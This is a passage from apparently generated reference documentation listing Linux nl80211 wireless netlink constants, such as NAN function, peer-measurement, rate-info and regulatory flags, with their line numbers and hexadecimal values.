NL80211_MULTICAST_GROUP_VENDOR = "vendor" constant NL80211_NAN_FUNC_ATTR_MAX (line 5395) | NL80211_NAN_FUNC_ATTR_MAX = 0x10 constant NL80211_NAN_FUNC_CLOSE_RANGE (line 5396) | NL80211_NAN_FUNC_CLOSE_RANGE = 0x9 constant NL80211_NAN_FUNC_FOLLOW_UP (line 5397) | NL80211_NAN_FUNC_FOLLOW_UP = 0x2 constant NL80211_NAN_FUNC_FOLLOW_UP_DEST (line 5398) | NL80211_NAN_FUNC_FOLLOW_UP_DEST = 0x8 constant NL80211_NAN_FUNC_FOLLOW_UP_ID (line 5399) | NL80211_NAN_FUNC_FOLLOW_UP_ID = 0x6 constant NL80211_NAN_FUNC_FOLLOW_UP_REQ_ID (line 5400) | NL80211_NAN_FUNC_FOLLOW_UP_REQ_ID = 0x7 constant NL80211_NAN_FUNC_INSTANCE_ID (line 5401) | NL80211_NAN_FUNC_INSTANCE_ID = 0xf constant NL80211_NAN_FUNC_MAX_TYPE (line 5402) | NL80211_NAN_FUNC_MAX_TYPE = 0x2 constant NL80211_NAN_FUNC_PUBLISH_BCAST (line 5403) | NL80211_NAN_FUNC_PUBLISH_BCAST = 0x4 constant NL80211_NAN_FUNC_PUBLISH (line 5404) | NL80211_NAN_FUNC_PUBLISH = 0x0 constant NL80211_NAN_FUNC_PUBLISH_TYPE (line 5405) | NL80211_NAN_FUNC_PUBLISH_TYPE = 0x3 constant NL80211_NAN_FUNC_RX_MATCH_FILTER (line 5406) | NL80211_NAN_FUNC_RX_MATCH_FILTER = 0xd constant NL80211_NAN_FUNC_SERVICE_ID (line 5407) | NL80211_NAN_FUNC_SERVICE_ID = 0x2 constant NL80211_NAN_FUNC_SERVICE_ID_LEN (line 5408) | NL80211_NAN_FUNC_SERVICE_ID_LEN = 0x6 constant NL80211_NAN_FUNC_SERVICE_INFO (line 5409) | NL80211_NAN_FUNC_SERVICE_INFO = 0xb constant NL80211_NAN_FUNC_SERVICE_SPEC_INFO_MAX_LEN (line 5410) | NL80211_NAN_FUNC_SERVICE_SPEC_INFO_MAX_LEN = 0xff constant NL80211_NAN_FUNC_SRF (line 5411) | NL80211_NAN_FUNC_SRF = 0xc constant NL80211_NAN_FUNC_SRF_MAX_LEN (line 5412) | NL80211_NAN_FUNC_SRF_MAX_LEN = 0xff constant NL80211_NAN_FUNC_SUBSCRIBE_ACTIVE (line 5413) | NL80211_NAN_FUNC_SUBSCRIBE_ACTIVE = 0x5 constant NL80211_NAN_FUNC_SUBSCRIBE (line 5414) | NL80211_NAN_FUNC_SUBSCRIBE = 0x1 constant NL80211_NAN_FUNC_TERM_REASON (line 5415) | NL80211_NAN_FUNC_TERM_REASON = 0x10 constant NL80211_NAN_FUNC_TERM_REASON_ERROR (line 5416) | NL80211_NAN_FUNC_TERM_REASON_ERROR = 0x2 constant NL80211_NAN_FUNC_TERM_REASON_TTL_EXPIRED (line 5417) | NL80211_NAN_FUNC_TERM_REASON_TTL_EXPIRED = 0x1 constant NL80211_NAN_FUNC_TERM_REASON_USER_REQUEST (line 5418) | NL80211_NAN_FUNC_TERM_REASON_USER_REQUEST = 0x0 constant NL80211_NAN_FUNC_TTL (line 5419) | NL80211_NAN_FUNC_TTL = 0xa constant NL80211_NAN_FUNC_TX_MATCH_FILTER (line 5420) | NL80211_NAN_FUNC_TX_MATCH_FILTER = 0xe constant NL80211_NAN_FUNC_TYPE (line 5421) | NL80211_NAN_FUNC_TYPE = 0x1 constant NL80211_NAN_MATCH_ATTR_MAX (line 5422) | NL80211_NAN_MATCH_ATTR_MAX = 0x2 constant NL80211_NAN_MATCH_FUNC_LOCAL (line 5423) | NL80211_NAN_MATCH_FUNC_LOCAL = 0x1 constant NL80211_NAN_MATCH_FUNC_PEER (line 5424) | NL80211_NAN_MATCH_FUNC_PEER = 0x2 constant NL80211_NAN_SOLICITED_PUBLISH (line 5425) | NL80211_NAN_SOLICITED_PUBLISH = 0x1 constant NL80211_NAN_SRF_ATTR_MAX (line 5426) | NL80211_NAN_SRF_ATTR_MAX = 0x4 constant NL80211_NAN_SRF_BF (line 5427) | NL80211_NAN_SRF_BF = 0x2 constant NL80211_NAN_SRF_BF_IDX (line 5428) | NL80211_NAN_SRF_BF_IDX = 0x3 constant NL80211_NAN_SRF_INCLUDE (line 5429) | NL80211_NAN_SRF_INCLUDE = 0x1 constant NL80211_NAN_SRF_MAC_ADDRS (line 5430) | NL80211_NAN_SRF_MAC_ADDRS = 0x4 constant NL80211_NAN_UNSOLICITED_PUBLISH (line 5431) | NL80211_NAN_UNSOLICITED_PUBLISH = 0x2 constant NL80211_NUM_ACS (line 5432) | NL80211_NUM_ACS = 0x4 constant NL80211_P2P_PS_SUPPORTED (line 5433) | NL80211_P2P_PS_SUPPORTED = 0x1 constant NL80211_P2P_PS_UNSUPPORTED (line 5434) | NL80211_P2P_PS_UNSUPPORTED = 0x0 constant NL80211_PKTPAT_MASK (line 5435) | NL80211_PKTPAT_MASK = 0x1 constant NL80211_PKTPAT_OFFSET (line 5436) | NL80211_PKTPAT_OFFSET = 0x3 constant NL80211_PKTPAT_PATTERN (line 5437) | NL80211_PKTPAT_PATTERN = 0x2 constant NL80211_PLINK_ACTION_BLOCK (line 5438) | NL80211_PLINK_ACTION_BLOCK = 0x2 constant NL80211_PLINK_ACTION_NO_ACTION (line 5439) | NL80211_PLINK_ACTION_NO_ACTION = 0x0 constant NL80211_PLINK_ACTION_OPEN (line 5440) | NL80211_PLINK_ACTION_OPEN = 0x1 constant NL80211_PLINK_BLOCKED (line 5441) | NL80211_PLINK_BLOCKED = 0x6 constant NL80211_PLINK_CNF_RCVD (line 5442) | NL80211_PLINK_CNF_RCVD = 0x3 constant NL80211_PLINK_ESTAB (line 5443) | NL80211_PLINK_ESTAB = 0x4 constant NL80211_PLINK_HOLDING (line 5444) | NL80211_PLINK_HOLDING = 0x5 constant NL80211_PLINK_LISTEN (line 5445) | NL80211_PLINK_LISTEN = 0x0 constant NL80211_PLINK_OPN_RCVD (line 5446) | NL80211_PLINK_OPN_RCVD = 0x2 constant NL80211_PLINK_OPN_SNT (line 5447) | NL80211_PLINK_OPN_SNT = 0x1 constant NL80211_PMKSA_CANDIDATE_BSSID (line 5448) | NL80211_PMKSA_CANDIDATE_BSSID = 0x2 constant NL80211_PMKSA_CANDIDATE_INDEX (line 5449) | NL80211_PMKSA_CANDIDATE_INDEX = 0x1 constant NL80211_PMKSA_CANDIDATE_PREAUTH (line 5450) | NL80211_PMKSA_CANDIDATE_PREAUTH = 0x3 constant NL80211_PMSR_ATTR_MAX (line 5451) | NL80211_PMSR_ATTR_MAX = 0x5 constant NL80211_PMSR_ATTR_MAX_PEERS (line 5452) | NL80211_PMSR_ATTR_MAX_PEERS = 0x1 constant NL80211_PMSR_ATTR_PEERS (line 5453) | NL80211_PMSR_ATTR_PEERS = 0x5 constant NL80211_PMSR_ATTR_RANDOMIZE_MAC_ADDR (line 5454) | NL80211_PMSR_ATTR_RANDOMIZE_MAC_ADDR = 0x3 constant NL80211_PMSR_ATTR_REPORT_AP_TSF (line 5455) | NL80211_PMSR_ATTR_REPORT_AP_TSF = 0x2 constant NL80211_PMSR_ATTR_TYPE_CAPA (line 5456) | NL80211_PMSR_ATTR_TYPE_CAPA = 0x4 constant NL80211_PMSR_FTM_CAPA_ATTR_ASAP (line 5457) | NL80211_PMSR_FTM_CAPA_ATTR_ASAP = 0x1 constant NL80211_PMSR_FTM_CAPA_ATTR_BANDWIDTHS (line 5458) | NL80211_PMSR_FTM_CAPA_ATTR_BANDWIDTHS = 0x6 constant NL80211_PMSR_FTM_CAPA_ATTR_MAX_BURSTS_EXPONENT (line 5459) | NL80211_PMSR_FTM_CAPA_ATTR_MAX_BURSTS_EXPONENT = 0x7 constant NL80211_PMSR_FTM_CAPA_ATTR_MAX (line 5460) | NL80211_PMSR_FTM_CAPA_ATTR_MAX = 0xa constant NL80211_PMSR_FTM_CAPA_ATTR_MAX_FTMS_PER_BURST (line 5461) | NL80211_PMSR_FTM_CAPA_ATTR_MAX_FTMS_PER_BURST = 0x8 constant NL80211_PMSR_FTM_CAPA_ATTR_NON_ASAP (line 5462) | NL80211_PMSR_FTM_CAPA_ATTR_NON_ASAP = 0x2 constant NL80211_PMSR_FTM_CAPA_ATTR_NON_TRIGGER_BASED (line 5463) | NL80211_PMSR_FTM_CAPA_ATTR_NON_TRIGGER_BASED = 0xa constant NL80211_PMSR_FTM_CAPA_ATTR_PREAMBLES (line 5464) | NL80211_PMSR_FTM_CAPA_ATTR_PREAMBLES = 0x5 constant NL80211_PMSR_FTM_CAPA_ATTR_REQ_CIVICLOC (line 5465) | NL80211_PMSR_FTM_CAPA_ATTR_REQ_CIVICLOC = 0x4 constant NL80211_PMSR_FTM_CAPA_ATTR_REQ_LCI (line 5466) | NL80211_PMSR_FTM_CAPA_ATTR_REQ_LCI = 0x3 constant NL80211_PMSR_FTM_CAPA_ATTR_TRIGGER_BASED (line 5467) | NL80211_PMSR_FTM_CAPA_ATTR_TRIGGER_BASED = 0x9 constant NL80211_PMSR_FTM_FAILURE_BAD_CHANGED_PARAMS (line 5468) | NL80211_PMSR_FTM_FAILURE_BAD_CHANGED_PARAMS = 0x7 constant NL80211_PMSR_FTM_FAILURE_INVALID_TIMESTAMP (line 5469) | NL80211_PMSR_FTM_FAILURE_INVALID_TIMESTAMP = 0x5 constant NL80211_PMSR_FTM_FAILURE_NO_RESPONSE (line 5470) | NL80211_PMSR_FTM_FAILURE_NO_RESPONSE = 0x1 constant NL80211_PMSR_FTM_FAILURE_PEER_BUSY (line 5471) | NL80211_PMSR_FTM_FAILURE_PEER_BUSY = 0x6 constant NL80211_PMSR_FTM_FAILURE_PEER_NOT_CAPABLE (line 5472) | NL80211_PMSR_FTM_FAILURE_PEER_NOT_CAPABLE = 0x4 constant NL80211_PMSR_FTM_FAILURE_REJECTED (line 5473) | NL80211_PMSR_FTM_FAILURE_REJECTED = 0x2 constant NL80211_PMSR_FTM_FAILURE_UNSPECIFIED (line 5474) | NL80211_PMSR_FTM_FAILURE_UNSPECIFIED = 0x0 constant NL80211_PMSR_FTM_FAILURE_WRONG_CHANNEL (line 5475) | NL80211_PMSR_FTM_FAILURE_WRONG_CHANNEL = 0x3 constant NL80211_PMSR_FTM_REQ_ATTR_ASAP (line 5476) | NL80211_PMSR_FTM_REQ_ATTR_ASAP = 0x1 constant NL80211_PMSR_FTM_REQ_ATTR_BSS_COLOR (line 5477) | NL80211_PMSR_FTM_REQ_ATTR_BSS_COLOR = 0xd constant NL80211_PMSR_FTM_REQ_ATTR_BURST_DURATION (line 5478) | NL80211_PMSR_FTM_REQ_ATTR_BURST_DURATION = 0x5 constant NL80211_PMSR_FTM_REQ_ATTR_BURST_PERIOD (line 5479) | NL80211_PMSR_FTM_REQ_ATTR_BURST_PERIOD = 0x4 constant NL80211_PMSR_FTM_REQ_ATTR_FTMS_PER_BURST (line 5480) | NL80211_PMSR_FTM_REQ_ATTR_FTMS_PER_BURST = 0x6 constant NL80211_PMSR_FTM_REQ_ATTR_LMR_FEEDBACK (line 5481) | NL80211_PMSR_FTM_REQ_ATTR_LMR_FEEDBACK = 0xc constant NL80211_PMSR_FTM_REQ_ATTR_MAX (line 5482) | NL80211_PMSR_FTM_REQ_ATTR_MAX = 0xd constant NL80211_PMSR_FTM_REQ_ATTR_NON_TRIGGER_BASED (line 5483) | NL80211_PMSR_FTM_REQ_ATTR_NON_TRIGGER_BASED = 0xb constant NL80211_PMSR_FTM_REQ_ATTR_NUM_BURSTS_EXP (line 5484) | NL80211_PMSR_FTM_REQ_ATTR_NUM_BURSTS_EXP = 0x3 constant NL80211_PMSR_FTM_REQ_ATTR_NUM_FTMR_RETRIES (line 5485) | NL80211_PMSR_FTM_REQ_ATTR_NUM_FTMR_RETRIES = 0x7 constant NL80211_PMSR_FTM_REQ_ATTR_PREAMBLE (line 5486) | NL80211_PMSR_FTM_REQ_ATTR_PREAMBLE = 0x2 constant NL80211_PMSR_FTM_REQ_ATTR_REQUEST_CIVICLOC (line 5487) | NL80211_PMSR_FTM_REQ_ATTR_REQUEST_CIVICLOC = 0x9 constant NL80211_PMSR_FTM_REQ_ATTR_REQUEST_LCI (line 5488) | NL80211_PMSR_FTM_REQ_ATTR_REQUEST_LCI = 0x8 constant NL80211_PMSR_FTM_REQ_ATTR_TRIGGER_BASED (line 5489) | NL80211_PMSR_FTM_REQ_ATTR_TRIGGER_BASED = 0xa constant NL80211_PMSR_FTM_RESP_ATTR_BURST_DURATION (line 5490) | NL80211_PMSR_FTM_RESP_ATTR_BURST_DURATION = 0x7 constant NL80211_PMSR_FTM_RESP_ATTR_BURST_INDEX (line 5491) | NL80211_PMSR_FTM_RESP_ATTR_BURST_INDEX = 0x2 constant NL80211_PMSR_FTM_RESP_ATTR_BUSY_RETRY_TIME (line 5492) | NL80211_PMSR_FTM_RESP_ATTR_BUSY_RETRY_TIME = 0x5 constant NL80211_PMSR_FTM_RESP_ATTR_CIVICLOC (line 5493) | NL80211_PMSR_FTM_RESP_ATTR_CIVICLOC = 0x14 constant NL80211_PMSR_FTM_RESP_ATTR_DIST_AVG (line 5494) | NL80211_PMSR_FTM_RESP_ATTR_DIST_AVG = 0x10 constant NL80211_PMSR_FTM_RESP_ATTR_DIST_SPREAD (line 5495) | NL80211_PMSR_FTM_RESP_ATTR_DIST_SPREAD = 0x12 constant NL80211_PMSR_FTM_RESP_ATTR_DIST_VARIANCE (line 5496) | NL80211_PMSR_FTM_RESP_ATTR_DIST_VARIANCE = 0x11 constant NL80211_PMSR_FTM_RESP_ATTR_FAIL_REASON (line 5497) | NL80211_PMSR_FTM_RESP_ATTR_FAIL_REASON = 0x1 constant NL80211_PMSR_FTM_RESP_ATTR_FTMS_PER_BURST (line 5498) | NL80211_PMSR_FTM_RESP_ATTR_FTMS_PER_BURST = 0x8 constant NL80211_PMSR_FTM_RESP_ATTR_LCI (line 5499) | NL80211_PMSR_FTM_RESP_ATTR_LCI = 0x13 constant NL80211_PMSR_FTM_RESP_ATTR_MAX (line 5500) | NL80211_PMSR_FTM_RESP_ATTR_MAX = 0x15 constant NL80211_PMSR_FTM_RESP_ATTR_NUM_BURSTS_EXP (line 5501) | NL80211_PMSR_FTM_RESP_ATTR_NUM_BURSTS_EXP = 0x6 constant NL80211_PMSR_FTM_RESP_ATTR_NUM_FTMR_ATTEMPTS (line 5502) | NL80211_PMSR_FTM_RESP_ATTR_NUM_FTMR_ATTEMPTS = 0x3 constant NL80211_PMSR_FTM_RESP_ATTR_NUM_FTMR_SUCCESSES (line 5503) | NL80211_PMSR_FTM_RESP_ATTR_NUM_FTMR_SUCCESSES = 0x4 constant NL80211_PMSR_FTM_RESP_ATTR_PAD (line 5504) | NL80211_PMSR_FTM_RESP_ATTR_PAD = 0x15 constant NL80211_PMSR_FTM_RESP_ATTR_RSSI_AVG (line 5505) | NL80211_PMSR_FTM_RESP_ATTR_RSSI_AVG = 0x9 constant NL80211_PMSR_FTM_RESP_ATTR_RSSI_SPREAD (line 5506) | NL80211_PMSR_FTM_RESP_ATTR_RSSI_SPREAD = 0xa constant NL80211_PMSR_FTM_RESP_ATTR_RTT_AVG (line 5507) | NL80211_PMSR_FTM_RESP_ATTR_RTT_AVG = 0xd constant NL80211_PMSR_FTM_RESP_ATTR_RTT_SPREAD (line 5508) | NL80211_PMSR_FTM_RESP_ATTR_RTT_SPREAD = 0xf constant NL80211_PMSR_FTM_RESP_ATTR_RTT_VARIANCE (line 5509) | NL80211_PMSR_FTM_RESP_ATTR_RTT_VARIANCE = 0xe constant NL80211_PMSR_FTM_RESP_ATTR_RX_RATE (line 5510) | NL80211_PMSR_FTM_RESP_ATTR_RX_RATE = 0xc constant NL80211_PMSR_FTM_RESP_ATTR_TX_RATE (line 5511) | NL80211_PMSR_FTM_RESP_ATTR_TX_RATE = 0xb constant NL80211_PMSR_PEER_ATTR_ADDR (line 5512) | NL80211_PMSR_PEER_ATTR_ADDR = 0x1 constant NL80211_PMSR_PEER_ATTR_CHAN (line 5513) | NL80211_PMSR_PEER_ATTR_CHAN = 0x2 constant NL80211_PMSR_PEER_ATTR_MAX (line 5514) | NL80211_PMSR_PEER_ATTR_MAX = 0x4 constant NL80211_PMSR_PEER_ATTR_REQ (line 5515) | NL80211_PMSR_PEER_ATTR_REQ = 0x3 constant NL80211_PMSR_PEER_ATTR_RESP (line 5516) | NL80211_PMSR_PEER_ATTR_RESP = 0x4 constant NL80211_PMSR_REQ_ATTR_DATA (line 5517) | NL80211_PMSR_REQ_ATTR_DATA = 0x1 constant NL80211_PMSR_REQ_ATTR_GET_AP_TSF (line 5518) | NL80211_PMSR_REQ_ATTR_GET_AP_TSF = 0x2 constant NL80211_PMSR_REQ_ATTR_MAX (line 5519) | NL80211_PMSR_REQ_ATTR_MAX = 0x2 constant NL80211_PMSR_RESP_ATTR_AP_TSF (line 5520) | NL80211_PMSR_RESP_ATTR_AP_TSF = 0x4 constant NL80211_PMSR_RESP_ATTR_DATA (line 5521) | NL80211_PMSR_RESP_ATTR_DATA = 0x1 constant NL80211_PMSR_RESP_ATTR_FINAL (line 5522) | NL80211_PMSR_RESP_ATTR_FINAL = 0x5 constant NL80211_PMSR_RESP_ATTR_HOST_TIME (line 5523) | NL80211_PMSR_RESP_ATTR_HOST_TIME = 0x3 constant NL80211_PMSR_RESP_ATTR_MAX (line 5524) | NL80211_PMSR_RESP_ATTR_MAX = 0x6 constant NL80211_PMSR_RESP_ATTR_PAD (line 5525) | NL80211_PMSR_RESP_ATTR_PAD = 0x6 constant NL80211_PMSR_RESP_ATTR_STATUS (line 5526) | NL80211_PMSR_RESP_ATTR_STATUS = 0x2 constant NL80211_PMSR_STATUS_FAILURE (line 5527) | NL80211_PMSR_STATUS_FAILURE = 0x3 constant NL80211_PMSR_STATUS_REFUSED (line 5528) | NL80211_PMSR_STATUS_REFUSED = 0x1 constant NL80211_PMSR_STATUS_SUCCESS (line 5529) | NL80211_PMSR_STATUS_SUCCESS = 0x0 constant NL80211_PMSR_STATUS_TIMEOUT (line 5530) | NL80211_PMSR_STATUS_TIMEOUT = 0x2 constant NL80211_PMSR_TYPE_FTM (line 5531) | NL80211_PMSR_TYPE_FTM = 0x1 constant NL80211_PMSR_TYPE_INVALID (line 5532) | NL80211_PMSR_TYPE_INVALID = 0x0 constant NL80211_PMSR_TYPE_MAX (line 5533) | NL80211_PMSR_TYPE_MAX = 0x1 constant NL80211_PREAMBLE_DMG (line 5534) | NL80211_PREAMBLE_DMG = 0x3 constant NL80211_PREAMBLE_HE (line 5535) | NL80211_PREAMBLE_HE = 0x4 constant NL80211_PREAMBLE_HT (line 5536) | NL80211_PREAMBLE_HT = 0x1 constant NL80211_PREAMBLE_LEGACY (line 5537) | NL80211_PREAMBLE_LEGACY = 0x0 constant NL80211_PREAMBLE_VHT (line 5538) | NL80211_PREAMBLE_VHT = 0x2 constant NL80211_PROBE_RESP_OFFLOAD_SUPPORT_80211U (line 5539) | NL80211_PROBE_RESP_OFFLOAD_SUPPORT_80211U = 0x8 constant NL80211_PROBE_RESP_OFFLOAD_SUPPORT_P2P (line 5540) | NL80211_PROBE_RESP_OFFLOAD_SUPPORT_P2P = 0x4 constant NL80211_PROBE_RESP_OFFLOAD_SUPPORT_WPS2 (line 5541) | NL80211_PROBE_RESP_OFFLOAD_SUPPORT_WPS2 = 0x2 constant NL80211_PROBE_RESP_OFFLOAD_SUPPORT_WPS (line 5542) | NL80211_PROBE_RESP_OFFLOAD_SUPPORT_WPS = 0x1 constant NL80211_PROTOCOL_FEATURE_SPLIT_WIPHY_DUMP (line 5543) | NL80211_PROTOCOL_FEATURE_SPLIT_WIPHY_DUMP = 0x1 constant NL80211_PS_DISABLED (line 5544) | NL80211_PS_DISABLED = 0x0 constant NL80211_PS_ENABLED (line 5545) | NL80211_PS_ENABLED = 0x1 constant NL80211_RADAR_CAC_ABORTED (line 5546) | NL80211_RADAR_CAC_ABORTED = 0x2 constant NL80211_RADAR_CAC_FINISHED (line 5547) | NL80211_RADAR_CAC_FINISHED = 0x1 constant NL80211_RADAR_CAC_STARTED (line 5548) | NL80211_RADAR_CAC_STARTED = 0x5 constant NL80211_RADAR_DETECTED (line 5549) | NL80211_RADAR_DETECTED = 0x0 constant NL80211_RADAR_NOP_FINISHED (line 5550) | NL80211_RADAR_NOP_FINISHED = 0x3 constant NL80211_RADAR_PRE_CAC_EXPIRED (line 5551) | NL80211_RADAR_PRE_CAC_EXPIRED = 0x4 constant NL80211_RATE_INFO_10_MHZ_WIDTH (line 5552) | NL80211_RATE_INFO_10_MHZ_WIDTH = 0xb constant NL80211_RATE_INFO_160_MHZ_WIDTH (line 5553) | NL80211_RATE_INFO_160_MHZ_WIDTH = 0xa constant NL80211_RATE_INFO_320_MHZ_WIDTH (line 5554) | NL80211_RATE_INFO_320_MHZ_WIDTH = 0x12 constant NL80211_RATE_INFO_40_MHZ_WIDTH (line 5555) | NL80211_RATE_INFO_40_MHZ_WIDTH = 0x3 constant NL80211_RATE_INFO_5_MHZ_WIDTH (line 5556) | NL80211_RATE_INFO_5_MHZ_WIDTH = 0xc constant NL80211_RATE_INFO_80_MHZ_WIDTH (line 5557) | NL80211_RATE_INFO_80_MHZ_WIDTH = 0x8 constant NL80211_RATE_INFO_80P80_MHZ_WIDTH (line 5558) | NL80211_RATE_INFO_80P80_MHZ_WIDTH = 0x9 constant NL80211_RATE_INFO_BITRATE32 (line 5559) | NL80211_RATE_INFO_BITRATE32 = 0x5 constant NL80211_RATE_INFO_BITRATE (line 5560) | NL80211_RATE_INFO_BITRATE = 0x1 constant NL80211_RATE_INFO_EHT_GI_0_8 (line 5561) | NL80211_RATE_INFO_EHT_GI_0_8 = 0x0 constant NL80211_RATE_INFO_EHT_GI_1_6 (line 5562) | NL80211_RATE_INFO_EHT_GI_1_6 = 0x1 constant NL80211_RATE_INFO_EHT_GI_3_2 (line 5563) | NL80211_RATE_INFO_EHT_GI_3_2 = 0x2 constant NL80211_RATE_INFO_EHT_GI (line 5564) | NL80211_RATE_INFO_EHT_GI = 0x15 constant NL80211_RATE_INFO_EHT_MCS (line 5565) | NL80211_RATE_INFO_EHT_MCS = 0x13 constant NL80211_RATE_INFO_EHT_NSS (line 5566) | NL80211_RATE_INFO_EHT_NSS = 0x14 constant NL80211_RATE_INFO_EHT_RU_ALLOC_106 (line 5567) | NL80211_RATE_INFO_EHT_RU_ALLOC_106 = 0x3 constant NL80211_RATE_INFO_EHT_RU_ALLOC_106P26 (line 5568) | NL80211_RATE_INFO_EHT_RU_ALLOC_106P26 = 0x4 constant NL80211_RATE_INFO_EHT_RU_ALLOC_242 (line 5569) | NL80211_RATE_INFO_EHT_RU_ALLOC_242 = 0x5 constant NL80211_RATE_INFO_EHT_RU_ALLOC_26 (line 5570) | NL80211_RATE_INFO_EHT_RU_ALLOC_26 = 0x0 constant NL80211_RATE_INFO_EHT_RU_ALLOC_2x996 (line 5571) | NL80211_RATE_INFO_EHT_RU_ALLOC_2x996 = 0xb constant NL80211_RATE_INFO_EHT_RU_ALLOC_2x996P484 (line 5572) | NL80211_RATE_INFO_EHT_RU_ALLOC_2x996P484 = 0xc constant NL80211_RATE_INFO_EHT_RU_ALLOC_3x996 (line 5573) | NL80211_RATE_INFO_EHT_RU_ALLOC_3x996 = 0xd constant NL80211_RATE_INFO_EHT_RU_ALLOC_3x996P484 (line 5574) | NL80211_RATE_INFO_EHT_RU_ALLOC_3x996P484 = 0xe constant NL80211_RATE_INFO_EHT_RU_ALLOC_484 (line 5575) | NL80211_RATE_INFO_EHT_RU_ALLOC_484 = 0x6 constant NL80211_RATE_INFO_EHT_RU_ALLOC_484P242 (line 5576) | NL80211_RATE_INFO_EHT_RU_ALLOC_484P242 = 0x7 constant NL80211_RATE_INFO_EHT_RU_ALLOC_4x996 (line 5577) | NL80211_RATE_INFO_EHT_RU_ALLOC_4x996 = 0xf constant NL80211_RATE_INFO_EHT_RU_ALLOC_52 (line 5578) | NL80211_RATE_INFO_EHT_RU_ALLOC_52 = 0x1 constant NL80211_RATE_INFO_EHT_RU_ALLOC_52P26 (line 5579) | NL80211_RATE_INFO_EHT_RU_ALLOC_52P26 = 0x2 constant NL80211_RATE_INFO_EHT_RU_ALLOC_996 (line 5580) | NL80211_RATE_INFO_EHT_RU_ALLOC_996 = 0x8 constant NL80211_RATE_INFO_EHT_RU_ALLOC_996P484 (line 5581) | NL80211_RATE_INFO_EHT_RU_ALLOC_996P484 = 0x9 constant NL80211_RATE_INFO_EHT_RU_ALLOC_996P484P242 (line 5582) | NL80211_RATE_INFO_EHT_RU_ALLOC_996P484P242 = 0xa constant NL80211_RATE_INFO_EHT_RU_ALLOC (line 5583) | NL80211_RATE_INFO_EHT_RU_ALLOC = 0x16 constant NL80211_RATE_INFO_HE_1XLTF (line 5584) | NL80211_RATE_INFO_HE_1XLTF = 0x0 constant NL80211_RATE_INFO_HE_2XLTF (line 5585) | NL80211_RATE_INFO_HE_2XLTF = 0x1 constant NL80211_RATE_INFO_HE_4XLTF (line 5586) | NL80211_RATE_INFO_HE_4XLTF = 0x2 constant NL80211_RATE_INFO_HE_DCM (line 5587) | NL80211_RATE_INFO_HE_DCM = 0x10 constant NL80211_RATE_INFO_HE_GI_0_8 (line 5588) | NL80211_RATE_INFO_HE_GI_0_8 = 0x0 constant NL80211_RATE_INFO_HE_GI_1_6 (line 5589) | NL80211_RATE_INFO_HE_GI_1_6 = 0x1 constant NL80211_RATE_INFO_HE_GI_3_2 (line 5590) | NL80211_RATE_INFO_HE_GI_3_2 = 0x2 constant NL80211_RATE_INFO_HE_GI (line 5591) | NL80211_RATE_INFO_HE_GI = 0xf constant NL80211_RATE_INFO_HE_MCS (line 5592) | NL80211_RATE_INFO_HE_MCS = 0xd constant NL80211_RATE_INFO_HE_NSS (line 5593) | NL80211_RATE_INFO_HE_NSS = 0xe constant NL80211_RATE_INFO_HE_RU_ALLOC_106 (line 5594) | NL80211_RATE_INFO_HE_RU_ALLOC_106 = 0x2 constant NL80211_RATE_INFO_HE_RU_ALLOC_242 (line 5595) | NL80211_RATE_INFO_HE_RU_ALLOC_242 = 0x3 constant NL80211_RATE_INFO_HE_RU_ALLOC_26 (line 5596) | NL80211_RATE_INFO_HE_RU_ALLOC_26 = 0x0 constant NL80211_RATE_INFO_HE_RU_ALLOC_2x996 (line 5597) | NL80211_RATE_INFO_HE_RU_ALLOC_2x996 = 0x6 constant NL80211_RATE_INFO_HE_RU_ALLOC_484 (line 5598) | NL80211_RATE_INFO_HE_RU_ALLOC_484 = 0x4 constant NL80211_RATE_INFO_HE_RU_ALLOC_52 (line 5599) | NL80211_RATE_INFO_HE_RU_ALLOC_52 = 0x1 constant NL80211_RATE_INFO_HE_RU_ALLOC_996 (line 5600) | NL80211_RATE_INFO_HE_RU_ALLOC_996 = 0x5 constant NL80211_RATE_INFO_HE_RU_ALLOC (line 5601) | NL80211_RATE_INFO_HE_RU_ALLOC = 0x11 constant NL80211_RATE_INFO_MAX (line 5602) | NL80211_RATE_INFO_MAX = 0x1d constant NL80211_RATE_INFO_MCS (line 5603) | NL80211_RATE_INFO_MCS = 0x2 constant NL80211_RATE_INFO_SHORT_GI (line 5604) | NL80211_RATE_INFO_SHORT_GI = 0x4 constant NL80211_RATE_INFO_VHT_MCS (line 5605) | NL80211_RATE_INFO_VHT_MCS = 0x6 constant NL80211_RATE_INFO_VHT_NSS (line 5606) | NL80211_RATE_INFO_VHT_NSS = 0x7 constant NL80211_REGDOM_SET_BY_CORE (line 5607) | NL80211_REGDOM_SET_BY_CORE = 0x0 constant NL80211_REGDOM_SET_BY_COUNTRY_IE (line 5608) | NL80211_REGDOM_SET_BY_COUNTRY_IE = 0x3 constant NL80211_REGDOM_SET_BY_DRIVER (line 5609) | NL80211_REGDOM_SET_BY_DRIVER = 0x2 constant NL80211_REGDOM_SET_BY_USER (line 5610) | NL80211_REGDOM_SET_BY_USER = 0x1 constant NL80211_REGDOM_TYPE_COUNTRY (line 5611) | NL80211_REGDOM_TYPE_COUNTRY = 0x0 constant NL80211_REGDOM_TYPE_CUSTOM_WORLD (line 5612) | NL80211_REGDOM_TYPE_CUSTOM_WORLD = 0x2 constant NL80211_REGDOM_TYPE_INTERSECTION (line 5613) | NL80211_REGDOM_TYPE_INTERSECTION = 0x3 constant NL80211_REGDOM_TYPE_WORLD (line 5614) | NL80211_REGDOM_TYPE_WORLD = 0x1 constant NL80211_REG_RULE_ATTR_MAX (line 5615) | NL80211_REG_RULE_ATTR_MAX = 0x8 constant NL80211_REKEY_DATA_AKM (line 5616) | NL80211_REKEY_DATA_AKM = 0x4 constant NL80211_REKEY_DATA_KCK (line 5617) | NL80211_REKEY_DATA_KCK = 0x2 constant NL80211_REKEY_DATA_KEK (line 5618) | NL80211_REKEY_DATA_KEK = 0x1 constant NL80211_REKEY_DATA_REPLAY_CTR (line 5619) | NL80211_REKEY_DATA_REPLAY_CTR = 0x3 constant NL80211_REPLAY_CTR_LEN (line 5620) | NL80211_REPLAY_CTR_LEN = 0x8 constant NL80211_RRF_AUTO_BW (line 5621) | NL80211_RRF_AUTO_BW = 0x800 constant NL80211_RRF_DFS (line 5622) | NL80211_RRF_DFS = 0x10 constant NL80211_RRF_GO_CONCURRENT (line 5623) | NL80211_RRF_GO_CONCURRENT = 0x1000 constant NL80211_RRF_IR_CONCURRENT (line 5624) | NL80211_RRF_IR_CONCURRENT = 0x1000 constant NL80211_RRF_NO_160MHZ (line 5625) | NL80211_RRF_NO_160MHZ = 0x10000 constant NL80211_RRF_NO_320MHZ (line 5626) | NL80211_RRF_NO_320MHZ = 0x40000 constant NL80211_RRF_NO_80MHZ (line 5627) | 